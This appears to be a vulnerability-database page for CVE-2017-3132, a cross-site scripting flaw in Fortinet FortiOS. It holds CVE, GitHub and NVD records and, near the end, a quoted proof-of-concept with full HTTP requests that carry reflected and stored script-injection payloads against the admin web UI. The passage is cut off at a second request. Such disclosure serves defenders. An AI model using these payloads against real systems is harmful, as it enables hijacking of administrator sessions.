CVE-2017-3132 (GCVE-0-2017-3132)

Vulnerability from cvelistv5

Published

2017-09-12 02:00

Modified

2024-10-25 14:12

Severity ?

CWE

Execute unauthorized code or commands

Summary

References

URL

Tags

psirt@fortinet.com	http://www.securityfocus.com/bid/100009	Third Party Advisory, VDB Entry
psirt@fortinet.com	http://www.securitytracker.com/id/1039020	Third Party Advisory, VDB Entry
psirt@fortinet.com	https://fortiguard.com/advisory/FG-IR-17-104	Vendor Advisory
psirt@fortinet.com	https://www.exploit-db.com/exploits/42388/	Exploit, Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/100009	Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	http://www.securitytracker.com/id/1039020	Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	https://fortiguard.com/advisory/FG-IR-17-104	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://www.exploit-db.com/exploits/42388/	Exploit, Third Party Advisory, VDB Entry

Impacted products

	Vendor	Product	Version
	Fortinet, Inc.	Fortinet FortiOS	Version: FortiOS versions 5.6.0 and earlier

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T14:16:28.245Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "100009",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/100009"
          },
          {
            "name": "1039020",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://www.securitytracker.com/id/1039020"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://fortiguard.com/advisory/FG-IR-17-104"
          },
          {
            "name": "42388",
            "tags": [
              "exploit",
              "x_refsource_EXPLOIT-DB",
              "x_transferred"
            ],
            "url": "https://www.exploit-db.com/exploits/42388/"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2017-3132",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-10-23T14:00:41.609477Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-10-25T14:12:36.355Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Fortinet FortiOS",
          "vendor": "Fortinet, Inc.",
          "versions": [
            {
              "status": "affected",
              "version": "FortiOS versions 5.6.0 and earlier"
            }
          ]
        }
      ],
      "datePublic": "2017-09-11T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "A Cross-Site Scripting vulnerability in Fortinet FortiOS versions 5.6.0 and earlier allows attackers to Execute unauthorized code or commands via the action input during the activation of a FortiToken."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "Execute unauthorized code or commands",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2017-09-12T09:57:01",
        "orgId": "6abe59d8-c742-4dff-8ce8-9b0ca1073da8",
        "shortName": "fortinet"
      },
      "references": [
        {
          "name": "100009",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/100009"
        },
        {
          "name": "1039020",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://www.securitytracker.com/id/1039020"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://fortiguard.com/advisory/FG-IR-17-104"
        },
        {
          "name": "42388",
          "tags": [
            "exploit",
            "x_refsource_EXPLOIT-DB"
          ],
          "url": "https://www.exploit-db.com/exploits/42388/"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "psirt@fortinet.com",
          "DATE_PUBLIC": "2017-09-11T00:00:00",
          "ID": "CVE-2017-3132",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "Fortinet FortiOS",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "FortiOS versions 5.6.0 and earlier"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "Fortinet, Inc."
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "A Cross-Site Scripting vulnerability in Fortinet FortiOS versions 5.6.0 and earlier allows attackers to Execute unauthorized code or commands via the action input during the activation of a FortiToken."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "Execute unauthorized code or commands"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "100009",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/100009"
            },
            {
              "name": "1039020",
              "refsource": "SECTRACK",
              "url": "http://www.securitytracker.com/id/1039020"
            },
            {
              "name": "https://fortiguard.com/advisory/FG-IR-17-104",
              "refsource": "CONFIRM",
              "url": "https://fortiguard.com/advisory/FG-IR-17-104"
            },
            {
              "name": "42388",
              "refsource": "EXPLOIT-DB",
              "url": "https://www.exploit-db.com/exploits/42388/"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "6abe59d8-c742-4dff-8ce8-9b0ca1073da8",
    "assignerShortName": "fortinet",
    "cveId": "CVE-2017-3132",
    "datePublished": "2017-09-12T02:00:00Z",
    "dateReserved": "2016-12-02T00:00:00",
    "dateUpdated": "2024-10-25T14:12:36.355Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2017-3132\",\"sourceIdentifier\":\"psirt@fortinet.com\",\"published\":\"2017-09-12T02:29:00.233\",\"lastModified\":\"2025-04-20T01:37:25.860\",\"vulnStatus\":\"Deferred\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"A Cross-Site Scripting vulnerability in Fortinet FortiOS versions 5.6.0 and earlier allows attackers to Execute unauthorized code or commands via the action input during the activation of a FortiToken.\"},{\"lang\":\"es\",\"value\":\"Una vulnerabilidad de tipo Cross-Site Scripting en Fortinet FortiOS en su versi\u00f3n 5.6.0 y anteriores permite que atacantes remotos ejecuten c\u00f3digo o comandos sin autorizaci\u00f3n mediante la entrada de acci\u00f3n durante la activaci\u00f3n de un FortiToken.\"}],\"metrics\":{\"cvssMetricV30\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.0\",\"vectorString\":\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\",\"baseScore\":6.1,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"REQUIRED\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.8,\"impactScore\":2.7}],\"cvssMetricV2\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"2.0\",\"vectorString\":\"AV:N/AC:M/Au:N/C:N/I:P/A:N\",\"baseScore\":4.3,\"accessVector\":\"NETWORK\",\"accessComplexity\":\"MEDIUM\",\"authentication\":\"NONE\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"PARTIAL\",\"availabilityImpact\":\"NONE\"},\"baseSeverity\":\"MEDIUM\",\"exploitabilityScore\":8.6,\"impactScore\":2.9,\"acInsufInfo\":false,\"obtainAllPrivilege\":false,\"obtainUserPrivilege\":false,\"obtainOtherPrivilege\":false,\"userInteractionRequired\":true}]},\"weaknesses\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-79\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*\",\"versionEndIncluding\":\"5.6.0\",\"matchCriteriaId\":\"A509FF43-9706-4EC7-B1D0-D3BF0569C9F6\"}]}]}],\"references\":[{\"url\":\"http://www.securityfocus.com/bid/100009\",\"source\":\"psirt@fortinet.com\",\"tags\":[\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://www.securitytracker.com/id/1039020\",\"source\":\"psirt@fortinet.com\",\"tags\":[\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"https://fortiguard.com/advisory/FG-IR-17-104\",\"source\":\"psirt@fortinet.com\",\"tags\":[\"Vendor Advisory\"]},{\"url\":\"https://www.exploit-db.com/exploits/42388/\",\"source\":\"psirt@fortinet.com\",\"tags\":[\"Exploit\",\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://www.securityfocus.com/bid/100009\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://www.securitytracker.com/id/1039020\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"https://fortiguard.com/advisory/FG-IR-17-104\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Vendor Advisory\"]},{\"url\":\"https://www.exploit-db.com/exploits/42388/\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Third Party Advisory\",\"VDB Entry\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CVE Program Container\", \"references\": [{\"url\": \"http://www.securityfocus.com/bid/100009\", \"name\": \"100009\", \"tags\": [\"vdb-entry\", \"x_refsource_BID\", \"x_transferred\"]}, {\"url\": \"http://www.securitytracker.com/id/1039020\", \"name\": \"1039020\", \"tags\": [\"vdb-entry\", \"x_refsource_SECTRACK\", \"x_transferred\"]}, {\"url\": \"https://fortiguard.com/advisory/FG-IR-17-104\", \"tags\": [\"x_refsource_CONFIRM\", \"x_transferred\"]}, {\"url\": \"https://www.exploit-db.com/exploits/42388/\", \"name\": \"42388\", \"tags\": [\"exploit\", \"x_refsource_EXPLOIT-DB\", \"x_transferred\"]}], \"providerMetadata\": {\"orgId\": \"af854a3a-2127-422b-91ae-364da2661108\", \"shortName\": \"CVE\", \"dateUpdated\": \"2024-08-05T14:16:28.245Z\"}}, {\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2017-3132\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"none\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2024-10-23T14:00:41.609477Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2024-10-23T14:01:52.879Z\"}}], \"cna\": {\"affected\": [{\"vendor\": \"Fortinet, Inc.\", \"product\": \"Fortinet FortiOS\", \"versions\": [{\"status\": \"affected\", \"version\": \"FortiOS versions 5.6.0 and earlier\"}]}], \"datePublic\": \"2017-09-11T00:00:00\", \"references\": [{\"url\": \"http://www.securityfocus.com/bid/100009\", \"name\": \"100009\", \"tags\": [\"vdb-entry\", \"x_refsource_BID\"]}, {\"url\": \"http://www.securitytracker.com/id/1039020\", \"name\": \"1039020\", \"tags\": [\"vdb-entry\", \"x_refsource_SECTRACK\"]}, {\"url\": \"https://fortiguard.com/advisory/FG-IR-17-104\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://www.exploit-db.com/exploits/42388/\", \"name\": \"42388\", \"tags\": [\"exploit\", \"x_refsource_EXPLOIT-DB\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"A Cross-Site Scripting vulnerability in Fortinet FortiOS versions 5.6.0 and earlier allows attackers to Execute unauthorized code or commands via the action input during the activation of a FortiToken.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"text\", \"description\": \"Execute unauthorized code or commands\"}]}], \"providerMetadata\": {\"orgId\": \"6abe59d8-c742-4dff-8ce8-9b0ca1073da8\", \"shortName\": \"fortinet\", \"dateUpdated\": \"2017-09-12T09:57:01\"}, \"x_legacyV4Record\": {\"affects\": {\"vendor\": {\"vendor_data\": [{\"product\": {\"product_data\": [{\"version\": {\"version_data\": [{\"version_value\": \"FortiOS versions 5.6.0 and earlier\"}]}, \"product_name\": \"Fortinet FortiOS\"}]}, \"vendor_name\": \"Fortinet, Inc.\"}]}}, \"data_type\": \"CVE\", \"references\": {\"reference_data\": [{\"url\": \"http://www.securityfocus.com/bid/100009\", \"name\": \"100009\", \"refsource\": \"BID\"}, {\"url\": \"http://www.securitytracker.com/id/1039020\", \"name\": \"1039020\", \"refsource\": \"SECTRACK\"}, {\"url\": \"https://fortiguard.com/advisory/FG-IR-17-104\", \"name\": \"https://fortiguard.com/advisory/FG-IR-17-104\", \"refsource\": \"CONFIRM\"}, {\"url\": \"https://www.exploit-db.com/exploits/42388/\", \"name\": \"42388\", \"refsource\": \"EXPLOIT-DB\"}]}, \"data_format\": \"MITRE\", \"description\": {\"description_data\": [{\"lang\": \"eng\", \"value\": \"A Cross-Site Scripting vulnerability in Fortinet FortiOS versions 5.6.0 and earlier allows attackers to Execute unauthorized code or commands via the action input during the activation of a FortiToken.\"}]}, \"problemtype\": {\"problemtype_data\": [{\"description\": [{\"lang\": \"eng\", \"value\": \"Execute unauthorized code or commands\"}]}]}, \"data_version\": \"4.0\", \"CVE_data_meta\": {\"ID\": \"CVE-2017-3132\", \"STATE\": \"PUBLIC\", \"ASSIGNER\": \"psirt@fortinet.com\", \"DATE_PUBLIC\": \"2017-09-11T00:00:00\"}}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2017-3132\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2024-10-25T14:12:36.355Z\", \"dateReserved\": \"2016-12-02T00:00:00\", \"assignerOrgId\": \"6abe59d8-c742-4dff-8ce8-9b0ca1073da8\", \"datePublished\": \"2017-09-12T02:00:00Z\", \"assignerShortName\": \"fortinet\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }
  }
}

ghsa-6pmp-vh39-v2fh

Vulnerability from github

Published

2022-05-17 01:06

Modified

2025-04-20 03:44

Severity ?

6.1 (Medium) - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Details

Show details on source website

JSON

To clipboard

{
  "affected": [],
  "aliases": [
    "CVE-2017-3132"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2017-09-12T02:29:00Z",
    "severity": "MODERATE"
  },
  "details": "A Cross-Site Scripting vulnerability in Fortinet FortiOS versions 5.6.0 and earlier allows attackers to Execute unauthorized code or commands via the action input during the activation of a FortiToken.",
  "id": "GHSA-6pmp-vh39-v2fh",
  "modified": "2025-04-20T03:44:44Z",
  "published": "2022-05-17T01:06:29Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-3132"
    },
    {
      "type": "WEB",
      "url": "https://fortiguard.com/advisory/FG-IR-17-104"
    },
    {
      "type": "WEB",
      "url": "https://www.exploit-db.com/exploits/42388"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/100009"
    },
    {
      "type": "WEB",
      "url": "http://www.securitytracker.com/id/1039020"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

fkie_cve-2017-3132

Vulnerability from fkie_nvd

Published

2017-09-12 02:29

Modified

2025-04-20 01:37

Severity ?

6.1 (Medium) - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Summary

References

URL	Tags
psirt@fortinet.com	http://www.securityfocus.com/bid/100009	Third Party Advisory, VDB Entry
psirt@fortinet.com	http://www.securitytracker.com/id/1039020	Third Party Advisory, VDB Entry
psirt@fortinet.com	https://fortiguard.com/advisory/FG-IR-17-104	Vendor Advisory
psirt@fortinet.com	https://www.exploit-db.com/exploits/42388/	Exploit, Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/100009	Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	http://www.securitytracker.com/id/1039020	Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	https://fortiguard.com/advisory/FG-IR-17-104	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://www.exploit-db.com/exploits/42388/	Exploit, Third Party Advisory, VDB Entry

Impacted products

	Vendor	Product	Version
	fortinet	fortios	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "A509FF43-9706-4EC7-B1D0-D3BF0569C9F6",
              "versionEndIncluding": "5.6.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "A Cross-Site Scripting vulnerability in Fortinet FortiOS versions 5.6.0 and earlier allows attackers to Execute unauthorized code or commands via the action input during the activation of a FortiToken."
    },
    {
      "lang": "es",
      "value": "Una vulnerabilidad de tipo Cross-Site Scripting en Fortinet FortiOS en su versi\u00f3n 5.6.0 y anteriores permite que atacantes remotos ejecuten c\u00f3digo o comandos sin autorizaci\u00f3n mediante la entrada de acci\u00f3n durante la activaci\u00f3n de un FortiToken."
    }
  ],
  "id": "CVE-2017-3132",
  "lastModified": "2025-04-20T01:37:25.860",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "MEDIUM",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "NONE",
          "baseScore": 4.3,
          "confidentialityImpact": "NONE",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
          "version": "2.0"
        },
        "exploitabilityScore": 8.6,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": true
      }
    ],
    "cvssMetricV30": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 6.1,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "LOW",
          "integrityImpact": "LOW",
          "privilegesRequired": "NONE",
          "scope": "CHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
          "version": "3.0"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 2.7,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2017-09-12T02:29:00.233",
  "references": [
    {
      "source": "psirt@fortinet.com",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securityfocus.com/bid/100009"
    },
    {
      "source": "psirt@fortinet.com",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securitytracker.com/id/1039020"
    },
    {
      "source": "psirt@fortinet.com",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://fortiguard.com/advisory/FG-IR-17-104"
    },
    {
      "source": "psirt@fortinet.com",
      "tags": [
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "https://www.exploit-db.com/exploits/42388/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securityfocus.com/bid/100009"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securitytracker.com/id/1039020"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://fortiguard.com/advisory/FG-IR-17-104"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "https://www.exploit-db.com/exploits/42388/"
    }
  ],
  "sourceIdentifier": "psirt@fortinet.com",
  "vulnStatus": "Deferred",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-79"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

A Cross-Site Scripting vulnerability in Fortinet FortiOS versions 5.6.0 and earlier allows attackers to Execute unauthorized code or commands via the action input during the activation of a FortiToken. Fortinet FortiOS Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. FortiOS is prone to multiple cross-site scripting vulnerabilities. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. Fortinet FortiOS is a set of security operating systems developed by Fortinet Corporation for the FortiGate network security platform. The system provides users with various security functions such as firewall, anti-virus, IPSec/SSL VPN, Web content filtering and anti-spam. # Title: FortiOS <= 5.6.0 Multiple XSS Vulnerabilities

Vendor: Fortinet (www.fortinet.com)

CVE: CVE-2017-3131, CVE-2017-3132, CVE-2017-3133

Date: 28.07.2016

Author: Patryk Bogdan (@patryk_bogdan)

Affected FortiNet products: * CVE-2017-3131 : FortiOS versions 5.4.0 to 5.6.0 * CVE-2017-3132 : FortiOS versions upto 5.6.0 * CVE-2017-3133 : FortiOS versions upto 5.6.0

Fix: Upgrade to FortiOS version 5.6.1

Video PoC (add admin): https://youtu.be/fcpLStCD61Q

Vendor advisory: https://fortiguard.com/psirt/FG-IR-17-104

Vulns:

XSS in WEB UI - Applications:

URL: https://192.168.1.99/ng/fortiview/app/15832" onmouseover=alert('XSS') x="y

Http request: GET /ng/fortiview/app/15832%22%20onmouseover=alert('XSS')%20x=%22y HTTP/1.1 Host: 192.168.1.99 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Cookie: APSCOOKIE_573485771="Era%3D1%26Payload%3DA+atTWBwvFhsVyeZCawBjqawVjqToqqb7RtR7z65XQ1XA+FMbnMTjrQVL5M9SMja%0A5+K56lAZIAEoAPgLmHWvggOu4zlndadoAHR%2FOT7Jn3D35m6HugqQgMfMqs8JfWd9%0AZxzmYv40KrD1JvCdcctTzmuS+OEd08y+4Vh54tq%2Fap2ej%2F1gJfbaindJ5r4wDXZh%0A4q%2FfgVCdTfMFn+Mr6Xj5Og%3D%3D%0A%26AuthHash%3D9+TbiFXbk+Qkks0pPlkbNDx2L1EA%0A"; ccsrftoken_573485771="5424C6B3842788A23E3413307F1DFFC5"; ccsrftoken="5424C6B3842788A23E3413307F1DFFC5"; VDOM_573485771=root; csrftoken_573485771=da85e919f71a610c45aff174b23c7a10 DNT: 1 Connection: close Upgrade-Insecure-Requests: 1

Http response: HTTP/1.1 200 OK Date: Thu, 23 Mar 2017 12:07:47 GMT Server: xxxxxxxx-xxxxx Cache-Control: no-cache Pragma: no-cache Expires: -1 Vary: Accept-Encoding Content-Length: 6150 Connection: close Content-Type: text/html; charset=utf-8 X-Frame-Options: SAMEORIGIN Content-Security-Policy: frame-ancestors 'self' X-UA-Compatible: IE=Edge (...) 15832" onmouseover=alert('XSS') x="y (...)

XSS in WEB UI - Assign Token:

URL: https://192.168.1.99/p/user/ftoken/activate/user/guest/?action=%3C/script%3E%3Cscript%3Ealert('XSS')%3C/script%3E%3Cscript%3E

Http request: GET /p/user/ftoken/activate/user/guest/?action=%3C/script%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E%3Cscript%3E HTTP/1.1 Host: 192.168.1.99 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Cookie: APSCOOKIE_573485771="Era%3D1%26Payload%3DA+atTWBwvFhsVyeZCawBjqawVjqToqqb7RtR7z65XQ1XA+FMbnMTjrQVL5M9SMja%0A5+K56lAZIAEoAPgLmHWvggOu4zlndadoAHR%2FOT7Jn3D35m6HugqQgMfMqs8JfWd9%0ALuXSfDjrp0Gel8F8TeKlBgC3kk4P1mhdELHr2Cicb3Zb6hBUnT9ZZnjXC44Dc7bD%0Ae2ymJG%2FgbHFa+4N9AVDIrg%3D%3D%0A%26AuthHash%3DMyJMLA32ueruHIEKia2eb9BWi8oA%0A"; ccsrftoken_573485771="314A25687F6B2075F9413405575D477"; ccsrftoken="314A25687F6B2075F9413405575D477"; VDOM_573485771=root; csrftoken_573485771=593eb7ed5cb9704ffa4f388febbd5160 DNT: 1 Connection: close Upgrade-Insecure-Requests: 1

Http response: HTTP/1.1 200 OK Date: Thu, 23 Mar 2017 13:39:17 GMT Server: xxxxxxxx-xxxxx Content-Security-Policy: frame-ancestors 'self' Expires: Thu, 23 Mar 2017 13:39:17 GMT Vary: Cookie,Accept-Encoding Last-Modified: Thu, 23 Mar 2017 13:39:17 GMT X-UA-Compatible: IE=Edge Cache-Control: max-age=0 X-FRAME-OPTIONS: SAMEORIGIN Set-Cookie: csrftoken_573485771=593eb7ed5cb9704ffa4f388febbd5160; expires=Thu, 22-Mar-2018 13:39:17 GMT; Max-Age=31449600; Path=/ Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 3485 (...)

var ftokens = []; var action = ' alert('XSS') ';

(...)

Stored XSS in WEB UI - Replacement Messages:

1 - Http request:

POST /p/system/replacemsg/edit/sslvpn/sslvpn-login/ HTTP/1.1 Host: 192.168.1.99 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: / Accept-Language: pl,en-US;q=0.7,en;q=0.3 Referer: https://192.168.1.99/p/system/replacemsg/edit/sslvpn/sslvpn-login/ Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-CSRFTOKEN: d58f666c794024295cece8c5b8b6a3ff X-Requested-With: XMLHttpRequest Content-Length: 125 Cookie: guest_user_group_21232f297a57a5a743894a0e4a801fc3=; APSCOOKIE_573485771="Era%3D1%26Payload%3DA+atTWBwvFhsVyeZCawBjqawVjqToqqb7RtR7z65XQ1XA+FMbnMTjrQVL5M9SMja%0A5+K56lAZIAEoAPgLmHWvggOu4zlndadoAHR%2FOT7Jn3D35m6HugqQgMfMqs8JfWd9%0AYLFfh9FU2cKvm+hvxa8SbqbuwSnhEdeYV7CatzaScTAAOryJNdjQjDTLke8gJLfS%0A8Zx7lNyNxQr6xJIaKg5lpA%3D%3D%0A%26AuthHash%3D5NI4JPbIioX2ZJvxtEOGAOJ7q5UA%0A"; ccsrftoken_573485771="592068D7C2B5BDB7A91833DB6A512C14"; ccsrftoken="592068D7C2B5BDB7A91833DB6A512C14"; VDOM_573485771=root; csrftoken_573485771=d58f666c794024295cece8c5b8b6a3ff; EDIT_HISTORY_573485771=%5B%7B%22path%22%3A%22system.replacemsg%22%2C%22name%22%3A%22sslvpn%22%2C%22mkey%22%3A%22sslvpn-login%22%7D%5D DNT: 1 Connection: close

csrfmiddlewaretoken=d58f666c794024295cece8c5b8b6a3ff&buffer=ABC%3C%2Ftextarea%3E%0A%3Cscript%3Ealert('XSS')%3C%2Fscript%3E%0A

1 - Http response:

HTTP/1.1 302 FOUND Date: Thu, 23 Mar 2017 15:36:33 GMT Server: xxxxxxxx-xxxxx Content-Security-Policy: frame-ancestors 'self' Expires: Thu, 23 Mar 2017 15:36:33 GMT Last-Modified: Thu, 23 Mar 2017 15:36:33 GMT Cache-Control: max-age=0 X-FRAME-OPTIONS: SAMEORIGIN X-UA-Compatible: IE=Edge Set-Cookie: EDIT_HISTORY_573485771=%5B%7B%22path%22%3A%22system.replacemsg%22%2C%22name%22%3A%22sslvpn%22%2C%22mkey%22%3A%22sslvpn-login%22%7D%2C%7B%22path%22%3A%22system.replacemsg%22%2C%22name%22%3A%22sslvpn%22%2C%22mkey%22%3A%22sslvpn-login%22%7D%5D; Path=/ Location: https://192.168.1.99/p/system/replacemsg-group/edit/None/sslvpn/sslvpn-login/ Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 0

2 - Http request:

